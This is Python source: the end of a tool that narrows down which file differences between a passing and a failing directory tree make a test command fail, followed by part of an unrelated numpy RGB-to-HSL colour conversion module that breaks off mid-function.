return os.path.getmtime(path)
return None
fileCopyCache = FileCopyCache()
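# Example (hypothetical paths): when a cache directory is given, repeated copies of the same
# unmodified source file become hard links to one shared cached copy; without one, a regular
# copy is made each time.
#   fileCopyCache.copyFile("/tmp/passing/a.txt", "/tmp/work/job-0/a.txt", "/tmp/work/caches/job-0")
#   fileCopyCache.copyFile("/tmp/passing/a.txt", "/tmp/work/job-1/a.txt", None)  # plain copy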
# Runs a shell command
class ShellScript(object):
def __init__(self, commandText, cwd):
self.commandText = commandText
self.cwd = cwd
def process(self):
cwd = self.cwd
print("Running '" + self.commandText + "' in " + cwd)
try:
subprocess.check_call(["bash", "-c", "cd " + cwd + " && " + self.commandText])
return 0
except subprocess.CalledProcessError as e:
return e.returncode
# Base class that can hold the state of a file
class FileContent(object):
def apply(self, filePath, cachePath=None):
pass
def equals(self, other, checkWithFileSystem=False):
pass
# A FileContent that refers to the content of a specific file
class FileBacked_FileContent(FileContent):
def __init__(self, referencePath):
super(FileBacked_FileContent, self).__init__()
self.referencePath = referencePath
self.isLink = os.path.islink(self.referencePath)
def apply(self, filePath, cachePath=None):
fileCopyCache.copyFile(self.referencePath, filePath, cachePath)
def equals(self, other, checkWithFileSystem=False):
if not isinstance(other, FileBacked_FileContent):
return False
if self.referencePath == other.referencePath:
return True
if not checkWithFileSystem:
return False
if self.isLink and other.isLink:
return os.readlink(self.referencePath) == os.readlink(other.referencePath)
if self.isLink != other.isLink:
return False # symlink not equal to non-symlink
return filecmp.cmp(self.referencePath, other.referencePath)
def __str__(self):
return self.referencePath
# A FileContent describing the nonexistence of a file
class MissingFile_FileContent(FileContent):
def __init__(self):
super(MissingFile_FileContent, self).__init__()
def apply(self, filePath, cachePath=None):
fileIo.removePath(filePath)
def equals(self, other, checkWithFileSystem=False):
return isinstance(other, MissingFile_FileContent)
def __str__(self):
return "Empty"
# A FileContent describing a directory
class Directory_FileContent(FileContent):
def __init__(self):
super(Directory_FileContent, self).__init__()
def apply(self, filePath, cachePath=None):
fileIo.ensureDirExists(filePath)
def equals(self, other, checkWithFileSystem=False):
return isinstance(other, Directory_FileContent)
def __str__(self):
return "[empty dir]"
# A collection of many FileContent objects
class FilesState(object):
def __init__(self):
self.fileStates = OrderedDict()
def apply(self, filePath, cachePath=None):
for relPath, state in self.fileStates.items():
state.apply(fileIo.join(filePath, relPath), cachePath)
def add(self, filePath, fileContent):
self.fileStates[filePath] = fileContent
def addAllFrom(self, other):
for filePath in other.fileStates:
self.add(filePath, other.fileStates[filePath])
def getContent(self, filePath):
if filePath in self.fileStates:
return self.fileStates[filePath]
return None
def getKeys(self):
return self.fileStates.keys()
# returns a FilesState resembling <self> but without the keys for which other[key] == self[key]
def withoutDuplicatesFrom(self, other, checkWithFileSystem=False):
result = FilesState()
for filePath, fileState in self.fileStates.items():
otherContent = other.getContent(filePath)
if not fileState.equals(otherContent, checkWithFileSystem):
result.add(filePath, fileState)
return result
# returns self[fromIndex:toIndex]
def slice(self, fromIndex, toIndex):
result = FilesState()
for filePath in list(self.fileStates.keys())[fromIndex:toIndex]:
result.fileStates[filePath] = self.fileStates[filePath]
return result
def restrictedToKeysIn(self, other):
result = FilesState()
for filePath, fileState in self.fileStates.items():
if filePath in other.fileStates:
result.add(filePath, fileState)
return result
# returns a FilesState having the same keys as this FilesState, but with values taken from <other> when it has them, and <self> otherwise
def withConflictsFrom(self, other, listEmptyDirs = False):
result = FilesState()
for filePath, fileContent in self.fileStates.items():
if filePath in other.fileStates:
result.add(filePath, other.fileStates[filePath])
else:
result.add(filePath, fileContent)
if listEmptyDirs:
oldImpliedDirs = self.listImpliedDirs()
newImpliedDirs = result.listImpliedDirs()
for impliedDir in oldImpliedDirs:
if impliedDir not in newImpliedDirs and impliedDir not in result.fileStates:
result.add(impliedDir, MissingFile_FileContent())
return result
def checkSameKeys(self, other):
a = self.checkContainsKeys(other)
b = other.checkContainsKeys(self)
if a and b:
return True
if not a:
print("a does not contain all of the keys from b")
if not b:
print("b does not contain all of the keys from a")
return False
def checkContainsKeys(self, other):
contains = True
for f in other.fileStates.keys():
if f not in self.fileStates:
print("Found in " + other.summarize() + " but not in " + self.summarize() + ": " + f)
contains = False
return contains
# returns a set of paths to all of the dirs in <self> that are implied by any files in <self>
def listImpliedDirs(self):
dirs = set()
empty = MissingFile_FileContent()
keys = [key for (key, value) in self.fileStates.items() if not empty.equals(value)]
i = 0
while i < len(keys):
path = keys[i]
parent, child = os.path.split(path)
if parent == "":
parent = "."
if not parent in dirs:
dirs.add(parent)
keys.append(parent)
i += 1
return dirs
# returns a FilesState having all of the entries from <self>, plus empty entries for any keys in <other> not in <self>
def expandedWithEmptyEntriesFor(self, other):
impliedDirs = self.listImpliedDirs()
# now look for entries in <other> not present in <self>
result = self.clone()
for filePath in other.fileStates:
if filePath not in result.fileStates and filePath not in impliedDirs:
result.fileStates[filePath] = MissingFile_FileContent()
return result
def clone(self):
result = FilesState()
for path, content in self.fileStates.items():
result.add(path, content)
return result
def withoutEmptyEntries(self):
result = FilesState()
empty = MissingFile_FileContent()
for path, state in self.fileStates.items():
if not empty.equals(state):
result.add(path, state)
return result
def getCommonDir(self):
result = fileIo.commonPrefix(self.fileStates.keys())
return result
# Returns a list of FilesState objects each containing a different subdirectory of <self>
# If groupDirectFilesTogether == True, then all files directly under self.getCommonDir() will be assigned to the same group
def groupByDirs(self, groupDirectFilesTogether = False):
if len(self.fileStates) <= 1:
if len(self.fileStates) == 1:
return [self]
return []
commonDir = self.getCommonDir()
if commonDir is None:
prefixLength = 0
else:
prefixLength = len(commonDir) + 1 # skip the following '/'
groupsByDir = {}
for filePath, fileContent in self.fileStates.items():
subPath = filePath[prefixLength:]
slashIndex = subPath.find("/")
if slashIndex < 0:
if groupDirectFilesTogether:
firstDir = ""
else:
firstDir = subPath
else:
firstDir = subPath[:slashIndex]
if not firstDir in groupsByDir:
groupsByDir[firstDir] = FilesState()
groupsByDir[firstDir].add(filePath, fileContent)
return [group for group in groupsByDir.values()]
# splits into multiple, smaller, FilesState objects
def splitOnce(self, maxNumChildren = 2):
if self.size() <= 1:
return [self]
children = self.groupByDirs(True)
if len(children) == 1:
children = children[0].groupByDirs(False)
if len(children) > maxNumChildren:
# If there are lots of child directories, we still want to test a smaller number of larger groups before testing smaller groups
# So we arbitrarily recombine child directories to make a smaller number of children
minIndex = 0
mergedChildren = []
for i in range(maxNumChildren):
maxIndex = len(children) * (i + 1) // maxNumChildren
merge = FilesState()
for child in children[minIndex:maxIndex]:
merge.addAllFrom(child)
mergedChildren.append(merge)
minIndex = maxIndex
children = mergedChildren
return children
def summarize(self):
numFiles = self.size()
commonDir = self.getCommonDir()
if numFiles <= 4:
return str(self)
if commonDir is not None:
return str(numFiles) + " files under " + str(commonDir)
return str(numFiles) + " files"
def size(self):
return len(self.fileStates)
def __str__(self):
if len(self.fileStates) == 0:
return "[empty fileState]"
entries = []
for filePath, state in self.fileStates.items():
entries.append(filePath + " -> " + str(state))
if len(self.fileStates) > 1:
prefix = str(len(entries)) + " entries:\n"
else:
prefix = "1 entry: "
return prefix + "\n".join(entries)
# Creates a FilesState matching the state of a directory on disk
def filesStateFromTree(rootPath):
rootPath = os.path.abspath(rootPath)
paths = []
states = {}
for root, dirPaths, filePaths in os.walk(rootPath, topdown=True):
if len(filePaths) == 0 and len(dirPaths) == 0:
relPath = os.path.relpath(root, rootPath)
paths.append(relPath)
states[relPath] = Directory_FileContent()
# include every file and every symlink (even if the symlink points to a dir)
leaves = filePaths
for dirPath in dirPaths:
fullPath = os.path.join(root, dirPath)
if os.path.islink(fullPath):
leaves.append(dirPath)
for filePath in leaves:
fullPath = fileIo.join(root, filePath)
relPath = os.path.relpath(fullPath, rootPath)
paths.append(relPath)
states[relPath] = FileBacked_FileContent(fullPath)
paths = sorted(paths)
state = FilesState()
for path in paths:
state.add(path, states[path])
return state
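# Example (hypothetical paths), sketching the core data flow used below: snapshot two trees,
# keep only the entries that differ, and split the differences into smaller groups to test:
#   passing = filesStateFromTree("/tmp/passing")
#   failing = filesStateFromTree("/tmp/failing")
#   diffs = failing.expandedWithEmptyEntriesFor(passing).withoutDuplicatesFrom(passing, True)
#   groups = diffs.splitOnce(4)  # a list of smaller FilesState objects to try applying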
# runs a Job in this process
def runJobInSameProcess(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe):
job = Job(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe)
job.runAndReport()
# starts a Job in a new process
def runJobInOtherProcess(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, queue, identifier):
parentWriter, childReader = multiprocessing.Pipe()
childInfo = TwoWayPipe(childReader, queue, identifier)
process = multiprocessing.Process(target=runJobInSameProcess, args=(shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, childInfo,))
process.start()
return parentWriter
class TwoWayPipe(object):
def __init__(self, readerConnection, writerQueue, identifier):
self.readerConnection = readerConnection
self.writerQueue = writerQueue
self.identifier = identifier
# Stores a subprocess for running tests and some information about which tests to run
class Job(object):
def __init__(self, shellCommand, workPath, cachePath, originalState, assumeNoSideEffects, full_resetTo_state, testState, twoWayPipe):
# the test to run
self.shellCommand = shellCommand
# directory to run the test in
self.workPath = workPath
# the state of our working directory
self.originalState = originalState
# whether to assume that the test won't change anything important
self.assumeNoSideEffects = assumeNoSideEffects
# the best accepted state
self.full_resetTo_state = full_resetTo_state
# the changes we're considering
self.testState = testState
self.pipe = twoWayPipe
self.cachePath = cachePath
def runAndReport(self):
succeeded = False
postState = None
try:
(succeeded, postState) = self.run()
finally:
print("^" * 100)
self.pipe.writerQueue.put((self.pipe.identifier, succeeded, postState))
def run(self):
print("#" * 100)
print("Checking " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") in " + str(self.workPath) + " at " + str(datetime.datetime.now()))
# compute the state that we want the files to be in before we start the test
fullStateToTest = self.full_resetTo_state.expandedWithEmptyEntriesFor(self.testState).withConflictsFrom(self.testState, True)
#print("Starting with original worker state of " + str(self.originalState))
# update our files on disk to match the state we want to test
fullStateToTest.expandedWithEmptyEntriesFor(self.originalState).withoutDuplicatesFrom(self.originalState).apply(self.workPath)
# run test
testStartSeconds = time.time()
testStart = datetime.datetime.now()
returnCode = ShellScript(self.shellCommand, self.workPath).process()
testEnd = datetime.datetime.now()
duration = (testEnd - testStart).total_seconds()
if self.assumeNoSideEffects:
# assume that no relevant files changed
postState = fullStateToTest
else:
# determine which files weren't changed by the test command
postState = filesStateFromTree(self.workPath)
for key in postState.getKeys():
modified = postState.getContent(key)
if isinstance(modified, FileBacked_FileContent):
# If any filepath wasn't modified since the start of the test, then its content matches the original
# (If the content is known to match the original, we won't have to reset it next time)
if os.path.getmtime(modified.referencePath) < testStartSeconds:
original = fullStateToTest.getContent(key)
if original is not None:
if isinstance(original, FileBacked_FileContent):
modified.referencePath = original.referencePath
# report results
if returnCode == 0:
print("Passed: " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") at " + str(datetime.datetime.now()) + " in " + str(duration))
return (True, postState)
else:
print("Failed: " + self.testState.summarize() + " (job " + str(self.pipe.identifier) + ") at " + str(datetime.datetime.now()) + " in " + str(duration))
return (False, postState)
# Runner class that determines which diffs between two directories cause the given shell command to fail
class DiffRunner(object):
def __init__(self, failingPath, passingPath, shellCommand, workPath, assumeNoSideEffects, assumeInputStatesAreCorrect, maxNumJobsAtOnce, timeoutSeconds):
# some simple params
self.workPath = os.path.abspath(workPath)
self.bestState_path = fileIo.join(self.workPath, "bestResults")
self.sampleFailure_path = fileIo.join(self.workPath, "sampleFailure")
self.testScript_path = fileIo.join(self.workPath, "test.sh")
fileIo.ensureDirExists(os.path.dirname(self.testScript_path))
fileIo.writeScript(self.testScript_path, shellCommand)
self.originalPassingPath = os.path.abspath(passingPath)
self.originalFailingPath = os.path.abspath(failingPath)
self.assumeNoSideEffects = assumeNoSideEffects
self.assumeInputStatesAreCorrect = assumeInputStatesAreCorrect
self.timeoutSeconds = timeoutSeconds
# lists of all the files under the two dirs
print("Finding files in " + passingPath)
self.originalPassingState = filesStateFromTree(passingPath)
print("Found " + self.originalPassingState.summarize() + " in " + str(passingPath))
print("")
print("Finding files in " + failingPath)
self.originalFailingState = filesStateFromTree(failingPath)
print("Found " + self.originalFailingState.summarize() + " in " + str(failingPath))
print("")
print("Identifying duplicates")
# list of the files in the state to reset to after each test
self.full_resetTo_state = self.originalPassingState
# minimal description of only the files that are supposed to need to be reset after each test
self.resetTo_state = self.originalPassingState.expandedWithEmptyEntriesFor(self.originalFailingState).withoutDuplicatesFrom(self.originalFailingState, True)
self.targetState = self.originalFailingState.expandedWithEmptyEntriesFor(self.originalPassingState).withoutDuplicatesFrom(self.originalPassingState, True)
self.originalNumDifferences = self.resetTo_state.size()
print("Processing " + str(self.originalNumDifferences) + " file differences")
self.maxNumJobsAtOnce = maxNumJobsAtOnce
def cleanupTempDirs(self):
print("Clearing work directories")
numAttempts = 3
for attempt in range(numAttempts):
if os.path.isdir(self.workPath):
for child in os.listdir(self.workPath):
if child.startswith("job-"):
path = os.path.join(self.workPath, child)
try:
fileIo.removePath(path)
except IOError as e:
if attempt >= numAttempts - 1:
raise Exception("Failed to remove " + path, e)
fileIo.removePath(os.path.join(self.workPath, "caches"))
def runnerTest(self, testState, timeout = None):
workPath = self.getWorkPath(0)
# reset state if needed
fileIo.removePath(workPath)
testState.apply(workPath)
start = datetime.datetime.now()
returnCode = ShellScript(self.testScript_path, workPath).process()
duration = (datetime.datetime.now() - start).total_seconds()
print("shell command completed in " + str(duration))
if returnCode == 0:
return (True, duration)
else:
if self.assumeNoSideEffects:
# unapply changes so that the contents of workPath should match self.resetTo_state
testState.withConflictsFrom(self.resetTo_state).apply(workPath)
return (False, duration)
def onSuccess(self, testState):
#print("Runner received success of testState: " + str(testState.summarize()))
if debug:
if not filesStateFromTree(self.bestState_path).checkSameKeys(self.full_resetTo_state.withoutEmptyEntries()):
print("Contents of " + self.bestState_path + " don't match self.full_resetTo_state at beginning of onSuccess")
sys.exit(1)
self.targetState = self.targetState.withoutDuplicatesFrom(testState)
self.resetTo_state = self.resetTo_state.withConflictsFrom(testState).withoutDuplicatesFrom(testState)
delta = self.full_resetTo_state.expandedWithEmptyEntriesFor(testState).withConflictsFrom(testState, True).withoutDuplicatesFrom(self.full_resetTo_state)
delta.apply(self.bestState_path)
self.full_resetTo_state = self.full_resetTo_state.expandedWithEmptyEntriesFor(delta).withConflictsFrom(delta)
if debug:
if not filesStateFromTree(self.bestState_path).checkSameKeys(self.full_resetTo_state.withoutEmptyEntries()):
print("Contents of " + self.bestState_path + " don't match self.full_resetTo_state at end of onSuccess")
print("Applied this delta: " + str(delta))
sys.exit(1)
def getWorkPath(self, jobId):
return os.path.join(self.workPath, "job-" + str(jobId))
def getFilesCachePath(self, jobId):
return os.path.join(self.workPath, "caches", "job-" + str(jobId))
def run(self):
start = datetime.datetime.now()
numIterationsCompleted = 0
self.cleanupTempDirs()
workPath = self.getWorkPath(0)
if not self.assumeInputStatesAreCorrect:
print("Testing that the given failing state actually fails")
fileIo.removePath(workPath)
if self.runnerTest(self.originalFailingState)[0]:
print("\nGiven failing state at " + self.originalFailingPath + " does not actually fail!")
return False
# clean up temporary dirs in case any daemons remain running
self.cleanupTempDirs()
print("Testing that the given passing state actually passes")
if not self.runnerTest(self.full_resetTo_state)[0]:
print("\nGiven passing state at " + self.originalPassingPath + " does not actually pass!")
return False
# clean up temporary dirs in case any daemons remain running
self.cleanupTempDirs()
print("Saving best state found so far")
fileIo.removePath(self.bestState_path)
self.full_resetTo_state.apply(self.bestState_path)
print("Starting")
print("You can inspect " + self.bestState_path + " while this process runs, to observe the best state discovered so far")
print("You can inspect " + self.sampleFailure_path + " while this process runs, to observe a state for which the test failed. If you delete this filepath, then it will be updated later to contain a new failing state")
print("")
# Now we search over groups of inodes (files or dirs) in the tree
# Every time we encounter a group of inodes, we try replacing them and seeing if the replacement passes our test
# If it does, we accept those changes and continue searching
# If it doesn't, we split that group into smaller groups and continue
jobId = 0
workingDir = self.getWorkPath(jobId)
queue = multiprocessing.Queue()
activeTestStatesById = {}
workerStatesById = {}
initialSplitSize = 2
if self.maxNumJobsAtOnce != "auto" and self.maxNumJobsAtOnce > 2:
initialSplitSize = self.maxNumJobsAtOnce
availableTestStates = self.targetState.splitOnce(initialSplitSize)
numConsecutiveFailures = 0
numFailuresSinceLastSplitOrSuccess = 0
numCompletionsSinceLastPoolSizeChange = 0
invalidatedIds = set()
probablyAcceptableStates = []
numCompletedTests = 2 # Already tested initial passing state and initial failing state
numJobsAtFirstSuccessAfterMerge = None
timedOut = False
# continue until all files fail and no jobs are running
while (numFailuresSinceLastSplitOrSuccess < self.resetTo_state.size() and not timedOut) or len(activeTestStatesById) > 0:
# display status message
now = datetime.datetime.now()
elapsedDuration = now - start
minNumTestsRemaining = sum([math.log(box.size(), 2) + 1 for box in availableTestStates + list(activeTestStatesById.values())]) - numFailuresSinceLastSplitOrSuccess
estimatedNumTestsRemaining = max(minNumTestsRemaining, 1)
if numConsecutiveFailures >= 4 and numFailuresSinceLastSplitOrSuccess < 1:
# If we are splitting often and failing often, then we probably haven't yet
# shrunken the individual boxes down to each contain only one failing file
# During this phase, on average we've completed half of the work
# So, we estimate that the total work remaining is double what we've completed
estimatedNumTestsRemaining *= 2
estimatedRemainingDuration = datetime.timedelta(seconds = elapsedDuration.total_seconds() * float(estimatedNumTestsRemaining) / float(numCompletedTests))
message = "Elapsed duration: " + str(elapsedDuration) + ". Waiting for " + str(len(activeTestStatesById)) + " active subprocesses (" + str(len(availableTestStates) + len(activeTestStatesById)) + " total available jobs). " + str(self.resetTo_state.size()) + " changes left to test, should take about " + str(estimatedNumTestsRemaining) + " tests, about " + str(estimatedRemainingDuration)
print(message)
if self.timeoutSeconds is not None:
# what fraction of the time is left
remainingTimeFraction = 1.0 - (elapsedDuration.total_seconds() / self.timeoutSeconds)
# how many jobs there will be if we add another one
possibleNumPendingJobs = len(activeTestStatesById) + 1
if possibleNumPendingJobs / (numCompletedTests + possibleNumPendingJobs) > remainingTimeFraction:
# adding one more job would be likely to cause us to exceed our time limit
timedOut = True
if len(activeTestStatesById) > 0:
# wait for a response from a worker
identifier, didAcceptState, workerNewState = queue.get()
box = activeTestStatesById[identifier]
#print("main process received worker new state of " + str(workerNewState))
workerStatesById[identifier] = workerNewState
numCompletedTests += 1
numCompletionsSinceLastPoolSizeChange += 1
if didAcceptState:
numConsecutiveFailures = 0
numFailuresSinceLastSplitOrSuccess = 0
acceptedState = box #.getAllFiles()
#print("Succeeded : " + acceptedState.summarize() + " (job " + str(identifier) + ") at " + str(datetime.datetime.now()))
maxRunningSize = max([state.size() for state in activeTestStatesById.values()])
maxRelevantSize = maxRunningSize / len(activeTestStatesById)
if acceptedState.size() < maxRelevantSize:
print("Queuing a retest of response of size " + str(acceptedState.size()) + " from job " + str(identifier) + " because a much larger job of size " + str(maxRunningSize) + " is still running")
probablyAcceptableStates.append(acceptedState)
else:
if identifier in invalidatedIds:
# queue a retesting of this box
print("Queuing a re-test of response from job " + str(identifier) + " due to previous invalidation. Successful state: " + str(acceptedState.summarize()))
probablyAcceptableStates.append(acceptedState)
else:
# A worker discovered a nonempty change that can be made successfully; update our best accepted state
self.onSuccess(acceptedState)
if debug:
# The files in self.bestState_path should exactly match what's in workPath[identifier], except for files that didn't originally exist
if not filesStateFromTree(self.bestState_path).checkSameKeys(filesStateFromTree(self.getWorkPath(identifier)).restrictedToKeysIn(self.originalPassingState.expandedWithEmptyEntriesFor(self.originalFailingState))):
print("Successful state from work path " + str(identifier) + " wasn't correctly copied to bestState. Could the test command be deleting files that previously existed?")
sys.exit(1)
# record that the results from any previously started process are no longer guaranteed to be valid
for i in activeTestStatesById.keys():
if i != identifier:
invalidatedIds.add(i)
# record our first success
if numJobsAtFirstSuccessAfterMerge is None:
numJobsAtFirstSuccessAfterMerge = len(availableTestStates)
else:
if not os.path.isdir(self.sampleFailure_path):
# save sample failure path where user can see it
print("Saving sample failed state to " + str(self.sampleFailure_path))
fileIo.ensureDirExists(self.sampleFailure_path)
self.full_resetTo_state.expandedWithEmptyEntriesFor(box).withConflictsFrom(box, True).apply(self.sampleFailure_path)
#print("Failed : " + box.summarize() + " (job " + str(identifier) + ") at " + str(datetime.datetime.now()))
# count failures
numConsecutiveFailures += 1
numFailuresSinceLastSplitOrSuccess += 1
# find any children that failed and queue a re-test of those children
updatedChild = box.withoutDuplicatesFrom(box.withConflictsFrom(self.resetTo_state))
if updatedChild.size() > 0:
if numConsecutiveFailures >= 4:
# Suppose we are trying to identify n single-file changes that cause failures
# Suppose we have tried c changes of size s, each one of which failed
# We conclude that n >= c
# A mostly unbiased estimate of c as a function of n is that c = n / 2
# Similarly, a mostly unbiased estimate of n is that n = c * 2
# We want to choose a new number of changes to test, c2, such that running c2 tests results in efficiently identifying the relevant n changes
# Let's set c2 = 2 * n = 2 * 2 * c
splitFactor = 4
else:
# After we reach a sufficiently small change size such that some changes start passing,
# Then we assume that we've probably narrowed down to each individual failing change,
# And we can increase block sizes more slowly
splitFactor = 2
split = updatedChild.splitOnce(splitFactor)
if len(split) > 1:
numFailuresSinceLastSplitOrSuccess = 0
availableTestStates += split
# clear invalidation status
if identifier in invalidatedIds:
invalidatedIds.remove(identifier)
del activeTestStatesById[identifier]
# Check whether we've had enough failures lately to warrant checking for the possibility of dependencies among files
if numJobsAtFirstSuccessAfterMerge is not None:
if len(availableTestStates) > 3 * numJobsAtFirstSuccessAfterMerge:
# It's plausible that every file in one directory depends on every file in another directory
# If this happens, then after we delete the dependent directory, we can delete the dependency directory too
# To make sure that we consider deleting the dependency directory, we recombine all of our states and start splitting from there
print("#############################################################")
print("# #")
print("# Lots of failures since first success!!!!!!!!!!!!!!!!!!!!! #")
print("# Recombining all states in case we uncovered a dependency! #")
print("# #")
print("#############################################################")
rejoinedState = FilesState()
for state in availableTestStates:
rejoinedState = rejoinedState.expandedWithEmptyEntriesFor(state).withConflictsFrom(state)
rejoinedState = rejoinedState.withoutDuplicatesFrom(self.resetTo_state)
availableTestStates = rejoinedState.splitOnce(initialSplitSize)
numFailuresSinceLastSplitOrSuccess = 0
numJobsAtFirstSuccessAfterMerge = None
numCompletionsSinceLastPoolSizeChange = 0
# if probablyAcceptableStates has become large enough, then retest its contents too
if len(probablyAcceptableStates) > 0 and (len(probablyAcceptableStates) >= len(activeTestStatesById) + 1 or numConsecutiveFailures >= len(activeTestStatesById) or len(activeTestStatesById) < 1):
probablyAcceptableState = FilesState()
for state in probablyAcceptableStates:
probablyAcceptableState = probablyAcceptableState.expandedWithEmptyEntriesFor(state).withConflictsFrom(state)
probablyAcceptableState = probablyAcceptableState.withoutDuplicatesFrom(self.resetTo_state)
if probablyAcceptableState.size() > 0:
print("Retesting " + str(len(probablyAcceptableStates)) + " previous likely successful states as a single test: " + probablyAcceptableState.summarize())
availableTestStates = [probablyAcceptableState] + availableTestStates
probablyAcceptableStates = []
if len(availableTestStates) < 1 and len(activeTestStatesById) < 1:
print("Error: no changes remain left to test. It was expected that applying all changes would fail")
break
# if we haven't checked everything yet, then try to queue more jobs
if numFailuresSinceLastSplitOrSuccess < self.resetTo_state.size():
availableTestStates.sort(reverse=True, key=FilesState.size)
if self.maxNumJobsAtOnce != "auto":
targetNumJobs = self.maxNumJobsAtOnce
else:
# If N jobs are running then wait for all N to fail before increasing the number of running jobs
# Recalibrate the number of processes based on the system load
systemUsageStats = cpuStats.cpu_times_percent()
systemIdleFraction = systemUsageStats.idle / 100
if systemIdleFraction >= 0.5:
if numCompletionsSinceLastPoolSizeChange <= len(activeTestStatesById):
# Not much time has passed since the previous time we changed the pool size
targetNumJobs = len(activeTestStatesById) + 1 # just replace existing job
else:
# We've been using less than the target capacity for a while, so add another job
targetNumJobs = len(activeTestStatesById) + 2 # replace existing job and add a new one
numCompletionsSinceLastPoolSizeChange = 0
else:
targetNumJobs = len(activeTestStatesById) # don't replace existing job
numCompletionsSinceLastPoolSizeChange = 0
if targetNumJobs < 1:
targetNumJobs = 1
print("System idle = " + str(systemIdleFraction) + ", current num jobs = " + str(len(activeTestStatesById) + 1) + ", target num jobs = " + str(targetNumJobs))
if timedOut:
print("Timeout reached, not starting new jobs")
else:
while len(activeTestStatesById) < targetNumJobs and len(activeTestStatesById) < self.resetTo_state.size() and len(availableTestStates) > 0:
# find next pending job
box = availableTestStates[0]
# find next unused job id
jobId = 0
while jobId in activeTestStatesById:
jobId += 1
# start job
workingDir = self.getWorkPath(jobId)
cacheDir = self.getFilesCachePath(jobId)
if jobId in workerStatesById:
workerPreviousState = workerStatesById[jobId]
else:
workerPreviousState = FilesState()
runJobInOtherProcess(self.testScript_path, workingDir, cacheDir, workerPreviousState, self.assumeNoSideEffects, self.full_resetTo_state, box, queue, jobId)
activeTestStatesById[jobId] = box
availableTestStates = availableTestStates[1:]
if timedOut:
wasSuccessful = False
else:
print("double-checking results")
wasSuccessful = True
if not self.runnerTest(filesStateFromTree(self.bestState_path))[0]:
message = "Error: expected best state at " + self.bestState_path + " did not pass the second time. Could the test be non-deterministic?"
if self.assumeNoSideEffects:
message += " (it may help to remove the --assume-no-side-effects flag)"
if self.assumeInputStatesAreCorrect:
message += " (it may help to remove the --assume-input-states-are-correct flag)"
print(message)
wasSuccessful = False
self.cleanupTempDirs()
print("")
if self.targetState.size() < 1000:
filesDescription = str(self.targetState)
else:
filesDescription = str(self.targetState.summarize())
print("Done trying to transform the contents of passing path:\n " + self.originalPassingPath + "\ninto the contents of failing path:\n " + self.originalFailingPath)
print("Of " + str(self.originalNumDifferences) + " differences, could not accept: " + filesDescription)
print("The final accepted state can be seen at " + self.bestState_path)
if timedOut:
print("Note that these results might not be optimal due to reaching the timeout of " + str(self.timeoutSeconds) + " seconds")
return wasSuccessful
def main(args):
assumeNoSideEffects = False
assumeInputStatesAreCorrect = False
workPath = "/tmp/diff-filterer"
timeoutSeconds = None
maxNumJobsAtOnce = 1
while len(args) > 0:
arg = args[0]
if arg == "--assume-no-side-effects":
assumeNoSideEffects = True
args = args[1:]
continue
if arg == "--assume-input-states-are-correct":
assumeInputStatesAreCorrect = True
args = args[1:]
continue
if arg == "--work-path":
if len(args) < 2:
usage()
workPath = args[1]
args = args[2:]
continue
if arg == "--num-jobs":
if len(args) < 2:
usage()
val = args[1]
if val == "auto":
maxNumJobsAtOnce = val
else:
maxNumJobsAtOnce = int(val)
args = args[2:]
continue
if arg == "--timeout":
if len(args) < 2:
usage()
val = args[1]
timeoutSeconds = float(val)
args = args[2:]
continue
if arg == "--debug":
global debug
debug = True
args = args[1:]
continue
if len(arg) > 0 and arg[0] == "-":
print("Unrecognized argument: '" + arg + "'")
usage()
break
if len(args) != 3:
usage()
passingPath = args[0]
failingPath = args[1]
shellCommand = args[2]
startTime = datetime.datetime.now()
if not os.path.exists(passingPath):
print("Specified passing path " + passingPath + " does not exist")
sys.exit(1)
if not os.path.exists(failingPath):
print("Specified failing path " + failingPath + " does not exist")
sys.exit(1)
success = DiffRunner(failingPath, passingPath, shellCommand, workPath, assumeNoSideEffects, assumeInputStatesAreCorrect, maxNumJobsAtOnce, timeoutSeconds).run()
endTime = datetime.datetime.now()
duration = endTime - startTime
if success:
print("Succeeded in " + str(duration))
else:
print("Failed in " + str(duration))
sys.exit(1)
main(sys.argv[1:])
|
__init__.py
|
import numpy as np
import threading
import multiprocessing
import math
def rgb2hsl(rgb):
def core(_rgb, _hsl):
irgb = _rgb.astype(np.uint16)
ir, ig, ib = irgb[:, :, 0], irgb[:, :, 1], irgb[:, :, 2]
h, s, l = _hsl[:, :, 0], _hsl[:, :, 1], _hsl[:, :, 2]
imin, imax = irgb.min(2), irgb.max(2)
iadd, isub = imax + imin, imax - imin
ltop = (iadd != 510) * (iadd > 255)
lbot = (iadd != 0) * (ltop == False)
        l[:] = iadd.astype(np.float64) / 510
        fsub = isub.astype(np.float64)
s[ltop] = fsub[ltop] / (510 - iadd[ltop])
s[lbot] = fsub[lbot] / iadd[lbot]
not_same = imax != imin
is_b_max = not_same * (imax == ib)
not_same_not_b_max = not_same * (is_b_max == False)
is_g_max = not_same_not_b_max * (imax == ig)
is_r_max = not_same_not_b_max * (is_g_max == False) * (imax == ir)
h[is_r_max] = ((0. + ig[is_r_max] - ib[is_r_max]) / isub[is_r_max])
h[is_g_max] = ((0. + ib[is_g_max] - ir[is_g_max]) / isub[is_g_max]) + 2
h[is_b_max] = ((0. + ir[is_b_max] - ig[is_b_max]) / isub[is_b_max]) + 4
h[h < 0] += 6
h[:] /= 6
    hsl = np.zeros(rgb.shape, dtype=np.float64)
cpus = multiprocessing.cpu_count()
length = int(math.ceil(float(hsl.shape[0]) / cpus))
line = 0
threads = []
while line < hsl.shape[0]:
line_next = line + length
thread = threading.Thread(target=core, args=(rgb[line:line_next], hsl[line:line_next]))
thread.start()
threads.append(thread)
line = line_next
for thread in threads:
thread.join()
return hsl
def hsl2rgb(hsl):
def core(_hsl, _frgb):
h, s, l = _hsl[:, :, 0], _hsl[:, :, 1], _hsl[:, :, 2]
fr, fg, fb = _frgb[:, :, 0], _frgb[:, :, 1], _frgb[:, :, 2]
        q = np.zeros(l.shape, dtype=np.float64)
lbot = l < 0.5
q[lbot] = l[lbot] * (1 + s[lbot])
ltop = lbot == False
l_ltop, s_ltop = l[ltop], s[ltop]
q[ltop] = (l_ltop + s_ltop) - (l_ltop * s_ltop)
p = 2 * l - q
q_sub_p = q - p
is_s_zero = s == 0
l_is_s_zero = l[is_s_zero]
per_3 = 1./3
per_6 = 1./6
two_per_3 = 2./3
